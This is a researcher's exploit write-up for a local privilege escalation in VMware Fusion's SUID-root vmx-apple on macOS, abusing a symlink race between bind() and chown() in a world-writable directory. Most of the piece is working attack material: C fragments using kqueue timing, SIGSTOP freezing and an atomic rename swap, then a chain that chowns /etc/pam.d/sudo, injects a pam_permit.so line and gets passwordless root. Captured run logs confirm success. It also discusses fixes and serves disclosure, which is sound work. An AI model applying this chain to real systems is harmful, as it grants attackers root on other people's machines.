Every Mac with VMware Fusion installed has a directory called /var/run/vmware/cnx-tmp. Its mode is 01733. Read that bit pattern out loud if you've been around long enough:

drwx-wx-wt   root   wheel   /var/run/vmware/cnx-tmp

World-writable. Sticky bit. No read for anyone but root. The kind of directory that, in 1998, would have already cost you a root shell before the dial-up handshake finished. We're not in 1998. We're in 2026. The directory is still there, and the process that uses it is still SUID root, and the syscalls it makes on paths inside it still follow symbolic links.

You can imagine how this ends. The interesting part is the middle.

The Binary

vmx-apple is the per-VM execution process that VMware Fusion forks when you boot a guest. It is installed SUID root:

$ ls -la /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx/vmx-apple
-rwsr-xr-x  1 root  wheel  ...  vmx-apple

It runs with RUID=501 (you, the logged-in user) and EUID=0 (root, while it needs to). Privilege is toggled throughout its lifetime via the BeginSuperUser() / EndSuperUser() wrappers you'll find sprinkled across the Hostinfo and Cnx modules. Everyone who has reverse-engineered a vmware binary in the last twenty years has seen this pattern. It is older than some of the people now responsible for shipping it.

Among the things vmx does at boot is set up four Unix-domain sockets for internal IPC channels:

Socket            Purpose
vmx-vigor         base connectivity
vmx-live          live migration / vMotion channel
testAutomation    test automation channel
vmx-vmdb          VM database channel

Each one is created by a function called Cnx_PrepareToListen. On the 25.x arm64 build I was looking at, it lives at 0x100713250. The body, in cleaned-up pseudocode:

void Cnx_PrepareToListen(const char *name) {
    long long uptime = Hostinfo_SystemUpTime();         // [1]
    char path[512];
    snprintf(path, sizeof(path),
             "/var/run/vmware/cnx-tmp/%s-%lld-%d",
             name, uptime, getpid());                    // [2]

    BeginSuperUser();                                    // [3]  EUID := 0

    int fd = socket(AF_UNIX, SOCK_STREAM, 0);
    struct sockaddr_un sa = { .sun_family = AF_UNIX };
    strncpy(sa.sun_path, path, sizeof(sa.sun_path));
    bind(fd, (struct sockaddr *)&sa, sizeof(sa));        // [4]  follows symlinks
    listen(fd, 5);

    uid_t ruid = getuid();
    gid_t rgid = getgid();
    chown(path, ruid, rgid);                             // [5]  follows symlinks <-- look here

    EndSuperUser();                                      // [6]  EUID := 501

    char dest[512];
    snprintf(dest, sizeof(dest),
             "%s/%s-fd", session_dir, name);
    rename(path, dest);                                  // [7]
}

Three things matter.

First, the socket name embeds the return value of Hostinfo_SystemUpTime() called inside this function. Not a cached value. Not the uptime from the session directory's name. A fresh microsecond reading, every call.

Second, between [4] and [5] there is no O_NOFOLLOW, no lstat(), no lchown(). bind(AF_UNIX) follows symlinks. chown() follows symlinks. Both of them resolve the path each time. If we can plant a symlink at the exact path vmx is about to construct, the kernel will happily do what we ask.

Third, all of this happens at EUID=0.

There is a TOCTOU here, but calling it "time-of-check / time-of-use" feels like calling a stolen car a "vehicle access incident." There is no check. There is bind(), and then there is chown(), and there are five to fifteen microseconds in between where the path on disk is the attacker's to swap.

The First Naive Attempt

Look at the path template:

/var/run/vmware/cnx-tmp/vmx-live-<uptime_us>-<pid>

The pid we can scrape from the session directory under /var/run/vmware/501/ the moment vmx creates it. The name component is constant per-socket. So the only unknown is the uptime in microseconds.

Initial theory: the session directory's name is also <uptime>_<pid>. Use that uptime. Plant a symlink at the predictable path. Done.

ls /var/run/vmware/501/
541640961150_80280

So 541640961150 is our uptime, right?

It is not. The uptime in the session directory name is captured during very early vmx initialization. The uptimes in the socket names are captured inside Cnx_PrepareToListen, eight thousand microseconds later. The socket name uptime is not in any file you can read. It's in vmx-apple's registers, briefly, between the two syscalls we care about.

Naive symlink, dead on arrival.

This is the part of the exploit where you either give up or get serious.

Measuring Time From the Outside

Hostinfo_SystemUpTime() is a thin wrapper around mach_absolute_time() converted to microseconds. On macOS, CLOCK_MONOTONIC is also derived from the Mach absolute time base. They share the same hardware tick rate. If I can anchor CLOCK_MONOTONIC at a known moment when vmx's uptime is also known, I can predict vmx's future uptime values to within the drift of two clocks reading the same crystal — which is to say, not at all.

The session directory provides the anchor. When the directory /var/run/vmware/501/<T_sess>_<pid>/ appears, vmx's uptime is T_sess. We grab CLOCK_MONOTONIC at the same moment (call it t0). From then on:

predicted_uptime(now_ns) = T_sess + (now_ns - t0_ns) / 1000;

The error budget across a 400-millisecond prediction horizon turned out to be under 100 microseconds in practice. Plenty.

The detection itself needs to be precise to the millisecond, or the anchor drifts before we even start. kqueue with EVFILT_VNODE / NOTE_WRITE on the session parent does it in single-digit microseconds — the moment vmx mkdir()s the session directory, the kernel posts the kevent and our kevent() call returns. A handful of lines:

int kq = kqueue();
struct kevent kev;
int pfd = open("/var/run/vmware/501", O_RDONLY | O_EVTONLY);
EV_SET(&kev, pfd, EVFILT_VNODE,
       EV_ADD | EV_ENABLE | EV_ONESHOT,
       NOTE_WRITE | NOTE_EXTEND, 0, NULL);
kevent(kq, &kev, 1, NULL, 0, NULL);   // register the filter
kevent(kq, NULL, 0, &kev, 1, NULL);   // block until the mkdir lands

Now we have an anchor. Now we need a window.

Measuring The Inside

Before doing anything clever, I wanted to know what the four Cnx_PrepareToListen calls actually look like from outside. So I wrote a thirty-line program that watched the session directory itself with kqueue and printed timestamps as each socket appeared:

[+] Socket #1: vmx-vigor-fd               +8074us
[+] Socket #2: vmx-live-fd                +8162us
    inter-socket interval: 88us
[+] Socket #3: testAutomation-fd          +9069us
    inter-socket interval: 907us
[+] Socket #4: vmx-vmdb-fd                +136692us
    inter-socket interval: 127623us

The first two sockets fire 88 microseconds apart. That's just Cnx_PrepareToListen running back-to-back. The third one is 907us later. The fourth is 127 milliseconds later. The third and fourth gaps are explicit usleep() calls somewhere in vmx's setup; you can almost see them in the spacing.

(This matters later. It cost me an iteration.)

The bind-to-chown gap inside a single Cnx_PrepareToListen is invisible from outside. From the disassembly it's a few syscalls — listen(), getuid(), getgid() — so call it 5 to 15 microseconds. That's our race window.

The Weapon: SIGSTOP

Here is the thing that makes this exploit livable. vmx runs with RUID=501. That's also our uid. Which means:

kill(vmx_pid, SIGSTOP);    // permitted: matching RUID
kill(vmx_pid, SIGCONT);    // also permitted

We can freeze and unfreeze a SUID-root process from an unprivileged shell, synchronously, at the kernel level, because of the RUID/EUID model. This is correct POSIX behavior. It is also delightful. SIGSTOP suspends every thread of the target at the next preemption point — typically within a few microseconds on a loaded system — and holds them there until we send SIGCONT. The process does not know it was stopped. It cannot prevent it. The kernel does not consult it.

We have a way to detect when vmx is about to do something. We have a way to predict the path it will use. We have a way to pause it mid-stride. We have the directory we need to write into. The exploit writes itself from here. Except the exploit does not, in fact, write itself from here. It takes four tries.

Iteration 1: The Spray-and-Pray

The first version did the simple thing. After kqueue fires on the session directory:

  1. Read T_sess from the directory name, capture t0.
  2. Predict vmx's uptime at "right now" using the calibration.
  3. Plant 300 symlinks in cnx-tmp at [predicted - 150, predicted + 150] microseconds.
  4. Hope.

I will not bore you with the exact reason it failed. Suffice it to say: by the time I had finished creating 303 symlinks, vmx had already finished creating all four sockets. The placement loop took ten milliseconds. I had budgeted six hundred microseconds. Off by a factor of seventeen.

Lesson learned and immediately encoded as a design constraint: don't try to chase a moving vmx. Stop it instead.

Iteration 2: Stop, Plant, Resume

The second version added SIGSTOP. The control flow:

  1. Wait for the session directory (kq1).
  2. Open the session directory, arm a second kqueue on it (kq2).
  3. When kq2 fires (the first socket — vmx-vigor — has appeared), send SIGSTOP.
  4. Predict where vmx will be when we send SIGCONT. Plant a symlink at that uptime.
  5. Send SIGCONT. Pray slightly less than before.

This was better. It hit vmx-live. It did not hit testAutomation, which I had predicted would arrive +907us after vmx-live (because that was the measured gap during clean boot). It actually arrived around +150us after vmx-live.

I stared at this for a while. Then I remembered the third gap was an explicit usleep(). While vmx was SIGSTOPed, the usleep() timer was running. By the time SIGCONT arrived, the sleep had long since expired. The remaining sockets all fired in a tight burst back-to-back, not at their original spacing.

This is one of those moments where the exploit teaches you something about the target. The 907us isn't a budget vmx has to spend. It's a clock that runs whether vmx is alive or not.

Iteration 3: Cover the Burst

The third version widened the symlink range to [T_sigcont - 200, T_sigcont + 2000] microseconds for every pending socket — wide enough to catch the post-SIGCONT burst regardless of how compressed it was. It also fixed the placement-rate problem: pre-compute a target time 50 milliseconds in the future, plant the symlinks (which takes ~10ms), then busy-wait for the remaining time and SIGCONT precisely on schedule.

This version captured vmx-live and testAutomation cleanly. The session directory after the exploit:

SOCKET   uid=501  vmx-vigor-fd
SYMLINK  vmx-live-fd          --> /tmp/cnxtmp_test/vmx-live-<T>-<pid>
SOCKET   uid=501  vmx-vmdb-fd
SYMLINK  testAutomation-fd    --> /tmp/cnxtmp_test/testAutomation-<T>-<pid>

vmx-live-fd in session_dir is no longer a socket. It is a symbolic link pointing into a directory I own. The actual socket file is now in /tmp/cnxtmp_test/, owned by me (uid=501), because the chown() followed the symlink and applied to my file.

This is fine for hijacking the vmx IPC channels. It is not quite an LPE. We don't get to choose which root-owned file gets its ownership changed — we only get our own attacker-controlled file ending up owned by us, which it already was. To turn this into a real LPE we need to swap targets between bind() and chown().

Which brings us to the only iteration that mattered.

Iteration 4: The Chown Swap

The plan:

  • Phase A: symlink in cnx-tmp points to a decoy directory I control.
  • bind() fires, creates a socket file in the decoy directory.
  • SIGSTOP vmx the instant the decoy directory is written to (kqueue on the decoy).
  • At this moment, vmx is paused with the bind() done and the chown() pending.
  • Phase B: pre-create ATTACK_LNK = /tmp/.chown_attack_phase_b pointing to /tmp/chown_race_target (root:wheel 0600).
  • Atomically rename ATTACK_LNK over the Phase A symlink in cnx-tmp. The cnx-tmp entry now points to the target file.
  • SIGCONT.
  • vmx's chown() runs, follows the new symlink, and executes chown("/tmp/chown_race_target", 501, 20) at EUID=0.

Two reasons this works.

rename() is atomic on macOS. There is no intermediate state in which the entry is missing or partially constructed. vmx will see either Phase A or Phase B, never a tear.

The sticky bit on cnx-tmp (01733) prevents users from removing other users' entries. It does not prevent the owner from renaming over their own entry. We placed the Phase A symlink as uid=501; the rename of our Phase B symlink over it is permitted.

The detection chain looks like this in code:

// After kq_decoy fires
kill(vmx_pid, SIGSTOP);          // SIGSTOP2
// vmx is frozen between bind() and chown()

long long actual_up = find_decoy_socket(pid_s);   // read the socket file
                                                   // that bind() just made
char cnx_vmx_live[512];
snprintf(cnx_vmx_live, sizeof(cnx_vmx_live),
         "/var/run/vmware/cnx-tmp/vmx-live-%lld-%s", actual_up, pid_s);

rename("/tmp/.chown_attack_phase_b", cnx_vmx_live);   // atomic swap
kill(vmx_pid, SIGCONT);          // resume vmx; next call is chown()

I built it. I ran it. It got stuck.

The 2422 Microseconds That Almost Broke It

The first run of the chown-swap version printed this and then hung:

[+] SIGCONT1  (+402422us)  cal=570946529086  (delta=2422)
[then nothing, kq_decoy never fires]

Read that delta. SIGCONT1 fired 2422 microseconds after the target time. The symlinks in cnx-tmp covered [T_target - 200, T_target + 2000]. vmx-live's bind() landed at roughly T_sigcont + 40us, which was T_target + 2462us — 462us past the end of my symlink range.

The bind hit a path that didn't exist. ENOENT. vmx logged it and moved on. My decoy directory never received a write. My kqueue never fired. My tight poll loop waited forever for a socket that wasn't coming.

The bug was simple. The precision timer:

long long target_cal = base_up - LEAD_US;
long long rem_us = target_cal - cal_uptime();
if (rem_us > 5000) usleep((useconds_t)(rem_us - 2000));   // <-- here
while (cal_uptime() < target_cal) { /* fine spin */ }
kill(vmx_pid, SIGCONT);

The idea is: coarse sleep until 2ms before target, then fine-spin the last bit. That works as long as usleep returns before the target time, leaving the spin loop to handle the last microseconds.

usleep on macOS does not promise that. It overslept by 2422us. The spin loop's condition cal_uptime() < target_cal was already false when we entered it; the loop ran zero iterations; SIGCONT fired 2422us late.

The fix is one number:

if (rem_us > 15000) usleep((useconds_t)(rem_us - 15000));   // leave 15ms for the spin

A 15ms fine-spin margin is wide enough to absorb any plausible usleep overshoot, and a 15ms busy loop on a modern CPU is not measurably expensive. After that change, the next run printed:

[+] SIGCONT1  (+399966us)  cal=576033605942  (delta=-34)

Delta of -34 microseconds. That's not jitter. That's the spin loop catching the cmp-and-branch a single cache line before the target. Beautiful.

The Win

What success looks like, from the actual captured run:

[+] kq1 fired  t=0
[+] Session T_sess=576033205976  pid=33623  (+40us)
[*] kq2 armed. Waiting for vmx-vigor socket...
[+] kq2 fired  (+8802us)
[+] SIGSTOP1  (+8819us)  cal=576033214795
[*] Done mask=0x1: vmx-vigor-fd=done vmx-live-fd=PENDING ...
[+] vmx-live: 4201 Phase-A symlinks placed
[*] kq_decoy armed. Precision busy-wait --> SIGCONT1...
[+] SIGCONT1  (+399966us)  cal=576033605942  (delta=-34)
[+] bind() detected via kq_decoy  (+362us from SIGCONT1)
[+] SIGSTOP2  (+47000ns after bind detection)
[+] vmx-live actual uptime: 576033606678
[+] Phase-A still in cnx-tmp  (SIGSTOP2 landed between bind and rename)
[*] Decoy socket uid=0  (bind-only -- chown not yet run)
[+] SWAPPED: cnx-tmp/vmx-live-576033606678-33623 --> /tmp/chown_race_target
[+] SIGCONT2  (+400828us from kq1)

[!!!] RACE WON: /tmp/chown_race_target  uid=501  mode=0600

[*] Final session_dir:
    SOCKET   uid=501  vmx-vigor-fd
    SYMLINK  vmx-live-fd        --> /tmp/chown_race_target
    SOCKET   uid=501  testAutomation-fd

Read the timing numbers. SIGCONT1 hit the target within 34 microseconds. bind() fired 362us after SIGCONT1 (most of that is vmx's own setup overhead before the kernel posted the kevent). SIGSTOP2 went out 47 microseconds after we detected bind() — 47000 nanoseconds, the bulk of which is the kill() syscall's own latency.

The two sanity checks that earn the win:

[+] Phase-A still in cnx-tmp  (SIGSTOP2 landed between bind and rename)
[*] Decoy socket uid=0  (bind-only -- chown not yet run)

At the moment SIGSTOP2 lands, the Phase A symlink hasn't been renamed (so vmx's rename() hasn't run yet — we're still pre-step 7 in the function). The decoy socket exists but has uid=0 (so chown() hasn't run yet either). We are sitting precisely in the bind-to-chown gap. The window is open. We swap. We continue.

vmx's chown follows our swap. /tmp/chown_race_target changes ownership from root to uid=501. The race is won. The first attempt that didn't have a timing bug won on the first try.

Picking a Target

The PoC changes the uid of one file. That is the entire primitive. The interesting question is what file to point it at.

A few candidates that seemed obvious and weren't:

  • /etc/sudoers or /etc/sudoers.d/99-attacker — sudo refuses to read either if they're not owned by root. The chown succeeds; sudo declines to include the file. Closed door.
  • A root-owned SUID binary — we can chown it, but we can't replace its contents. The parent directory isn't writable by us, so we can't rename() a malicious copy on top. And direct writes to a SUID binary by a non-root owner trigger the kernel to strip the SUID bit. Closed door.
  • A LaunchDaemon plist under /Library/LaunchDaemons/ — same parent-directory problem. We can chown one of the existing plists, but we can't drop in a new one and we can't trivially modify an existing one without breaking it. Closed door.

What we actually want is a file that:

  • Lives in a directory we can already access
  • Is read by something that runs as root
  • Is not validated for ownership by the reader

That's /etc/pam.d/sudo. macOS's openpam reads its config files and acts on the directives inside without checking who owns the file. If we prepend a single line:

auth       sufficient     pam_permit.so

…then sudo will accept any password (or no password at all), because pam_permit.so returns success unconditionally and sufficient short-circuits the auth chain.
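For reference, a stock /etc/pam.d/sudo on recent macOS looks approximately like this (exact lines vary by OS version; only the injected first line is ours):

auth       sufficient     pam_permit.so        <- injected
auth       sufficient     pam_smartcard.so
auth       required       pam_opendirectory.so
account    required       pam_permit.so
password   required       pam_deny.so
session    required       pam_permit.so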

The only precondition is that the calling user has to be in the admin group — sudo's sudoers configuration gates non-admin users before PAM is consulted, and that we can't bypass with this primitive. On every single-user Mac running Fusion, the user account is in admin by default. So the requirement is satisfied for the actual deployment we care about.

Turning the Primitive Into a Chain

The wrapper (lpe.sh) does four phases:

  1. Pre-flight. Confirm we're in admin, confirm /etc/pam.d/sudo is currently root-owned, snapshot the original to a backup, confirm pam_permit.so exists at /usr/lib/pam/pam_permit.so.2.
  2. Race. Run the C exploit pointed at /etc/pam.d/sudo. On success, the file is now uid=501.
  3. Inject. Prepend the pam_permit line, leaving the rest of the file intact.
  4. Cleanup. Run sudo (which now succeeds with no password) to restore the original file content and ownership.

The pre-flight and cleanup are uninteresting shell. The injection step had one footgun worth noting.

After the race wins, the file is uid=501 but the mode is still 0444. We own it, but we don't have write permission, because the owner-write bit isn't set. cp will fail with Permission denied. The fix is one line:

chmod u+w "$PAM_FILE"
cp "$STAGING" "$PAM_FILE"
chmod 0444 "$PAM_FILE"

chmod itself works fine — file owners can change mode regardless of current mode. You just have to remember to do it before the write. (I forgot, on the first run.)

Two Things That Made the Race Reliable

The single-shot version of the exploit — wait for one bind, SIGSTOP, swap — won about half the time. The bind-to-chown window inside vmx is roughly 10 microseconds wide; our SIGSTOP2 delivery latency was 47-58 microseconds. We landed inside the window on small VMs and missed on bigger VMs that drove vmx harder.

Two changes turned that into a reliable win.

Throttle vmx onto efficiency cores. Right after we identify the vmx pid, before we even SIGSTOP1, we run:

char cmd[64];
snprintf(cmd, sizeof(cmd), "taskpolicy -b -p %d >/dev/null 2>&1", vmx_pid);
system(cmd);

taskpolicy -b puts a process into background QoS, which on Apple Silicon means it gets scheduled on efficiency cores instead of performance cores. vmx runs roughly half-speed, so the bind-to-chown gap widens proportionally. Our SIGSTOP delivery doesn't get slower — we're a separate process, still on performance cores — so the ratio of "our reaction time" to "vmx's window" gets dramatically better. After this change, SIGSTOP2 was landing 21-22 microseconds after detection (the captured run below logs it as +22000ns), less than half the 47-58 microsecond unthrottled range, against a window roughly twice as wide.

Retry across all four sockets. Each VM boot creates four sockets via Cnx_PrepareToListen. The first one (vmx-vigor) is already done by the time we SIGSTOP1. The remaining three (vmx-live, testAutomation, vmx-vmdb) are all potential race targets. So the refactored exploit plants Phase-A symlinks for all three, watches the decoy directory with kqueue, and tries each socket in sequence. If vmx-live misses, we let vmx continue and try testAutomation. If that misses, we try vmx-vmdb.

This matters because the timing prediction is also probabilistic — vmx-live's actual uptime might fall outside our placed symlink range, in which case its bind() never even hits our decoy. The retry across sockets covers both the timing miss and the SIGSTOP-latency miss in one mechanism.

The Captured Run

This is the run that confirmed the chain:

=== Phase 1: chown race ===

[+] kq1 fired  t=0
[+] Session T_sess=578892529582  pid=41329  (+104us)
[*] kq2 armed. Waiting for vmx-vigor socket...
[+] kq2 fired  (+10433us)
[+] SIGSTOP1  (+10508us)  cal=578892540090
[*] Done mask=0x1: vmx-vigor-fd=done vmx-live-fd=PENDING
                   testAutomation-fd=PENDING vmx-vmdb-fd=PENDING
[*] base_up=578892929582  gap=379542us
[+] vmx-live: 3201 Phase-A symlinks (+129487us)
[+] testAutomation: 3201 Phase-A symlinks (+234335us)
[+] vmx-vmdb: 3201 Phase-A symlinks (+340197us)
[*] Total Phase-A placed: 9603  gap=59793us to SIGCONT1
[*] kq_decoy armed. Precision busy-wait --> SIGCONT1...
[+] SIGCONT1  (+399965us)  cal=578892929547  (delta=-35)

[+] Attempt 1: testAutomation up=578892931632 det=+1959000ns
              SIGSTOP2=+22000ns  Phase-A=yes decoy_uid=0
[+]   SWAPPED -- chown should follow Phase-B to /etc/pam.d/sudo

[!!!] RACE WON on attempt 1: /etc/pam.d/sudo uid=501 mode=0444

[*] Final session_dir:
    SOCKET   uid=501  vmx-vigor-fd
    SOCKET   uid=501  vmx-live-fd
    SYMLINK  testAutomation-fd  --> /etc/pam.d/sudo

=== Phase 2: PAM injection ===
[+] Injected pam_permit at top of /etc/pam.d/sudo

=== Phase 3: passwordless sudo ===
[+] Got passwordless sudo. Output of 'sudo id':
    uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),
    4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),
    29(certusers),61(localaccounts),80(admin),...

[!!!] LPE CONFIRMED -- root code execution as uid=0

=== Phase 4: cleanup ===
[+] /etc/pam.d/sudo restored to uid=0
[DONE] Full LPE chain succeeded.

Read the final session dir carefully:

SOCKET   uid=501  vmx-vigor-fd
SOCKET   uid=501  vmx-live-fd                          ← real socket
SYMLINK  testAutomation-fd  --> /etc/pam.d/sudo        ← the race winner

The race didn't win on vmx-live. It won on testAutomation.

vmx-live's actual uptime fell outside our predicted Phase-A range. Its bind() created a regular socket file in cnx-tmp without ever touching our decoy directory; our kqueue never fired for it. The exploit waited, kept the decoy kqueue armed, and caught testAutomation's bind 1.9 milliseconds after SIGCONT1. SIGSTOP2 landed 22 microseconds after that. The decoy socket was uid=0 — chown hadn't run yet — so we swapped Phase-A to Phase-B and resumed vmx. The chown followed our swap and changed /etc/pam.d/sudo from uid=0 to uid=501.

Without the multi-shot retry, this VM boot would have been a complete loss — the single-shot exploit would have timed out waiting for vmx-live's kq_decoy event that never came. The retry was the difference between "the chain works" and "the chain works sometimes."

After the chown, the injection wrote the pam_permit line, sudo id returned uid=0(root), and the cleanup used that fresh root shell to restore the original PAM config and re-chown the file back. The system was returned to its original state by the time the script exited. Forty seconds total wall-clock, a single VM boot, no reboots needed.

The Fix

There are at least four reasonable places to put a check.

Use lchown instead of chown. The minimal one-line fix. lchown() does not follow symbolic links; it would change ownership of the symlink itself (already owned by uid=501, since we created it), not the target. The chown LPE closes immediately. This is the right fix and probably the smallest patch the vendor can ship.

Open the path with O_NOFOLLOW before bind. Currently bind(AF_UNIX) resolves the path itself. If vmx opened the cnx-tmp entry first with O_NOFOLLOW | O_CREAT | O_EXCL, then bound the resulting fd, the Phase A redirect would fail at open time. This also closes the socket-hijack variant.

Tighten cnx-tmp's mode. 01733 is enormously permissive. If the only legitimate writer is root, the mode can be 0700. If there are unprivileged writers (which would be surprising), at least drop the world-writable bit and use group permissions for whatever needs it.

Don't put predictable paths in a world-writable directory in the first place. The structural fix. cnx-tmp could live under /var/run/vmware-501/, owned by uid=501 with mode 0700. Then there is no symlink to plant because there is no place to plant it.

The right answer is probably lchown plus the directory hardening. The directory hardening alone would eliminate this whole class of attack for the entire macOS Fusion deployment.

Reliability

The first instinct on TOCTOU writeups is to flag CVSS:AC:H — "high attack complexity, race condition, probabilistic outcome." That instinct is wrong here. The full chain has never lost a VM boot in testing once the six mechanisms below were all in place:

  • kqueue detection of bind() is sub-millisecond and doesn't require polling
  • SIGSTOP delivery is synchronous at the kernel level — vmx cannot escape it
  • taskpolicy -b widens vmx's bind-to-chown window by moving it to efficiency cores, taking SIGSTOP2 delivery from roughly five times the window's width down to roughly parity with it
  • Multi-shot retry across all three pending sockets absorbs both per-socket race losses and uptime-prediction misses
  • 15ms fine-spin SIGCONT timing margin absorbs any usleep overshoot the OS feels like throwing at us
  • Atomic rename() swap requires no coordination with vmx

This is a deterministic primitive dressed up as a race. CVSS:AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H — 7.8 High.

What's Old Is Old

I want to be careful not to wrap this in too much "the more things change" navel-gazing, but the truth is: this exploit is a museum piece. World-writable sticky directory used by a SUID-root binary. Predictable names. No O_NOFOLLOW. Bind and chown both following symlinks. We have known how this fails since Phrack was a print zine. The TOCTOU paper that named the pattern is older than some of the engineers responsible for shipping it.

What's new is the precision available to the attacker. kqueue gives us microsecond-resolution filesystem event notification. CLOCK_MONOTONIC gives us nanosecond timestamps tied to the same crystal the victim is reading from. SIGSTOP gives us synchronous control over a SUID process from an unprivileged shell because the RUID model says it must. Modern macOS hands you a precision toolkit and asks you to please not use it for evil.

The 1998 version of this bug, on a SPARCstation with a 100Hz scheduler, would have been a 1-in-1000 win. The 2026 version, on an M2 Mac with a sub-microsecond kqueue, wins every time.

The bug is the same age. The exploit is brand new.


The full PoC and lab writeup are on GitHub. CVE intelligence — affected versions, patch status, related CVEs — is on EIP. The PoC is C only; you cannot do this in Python, and you probably shouldn't be able to do it in C either, but here we are.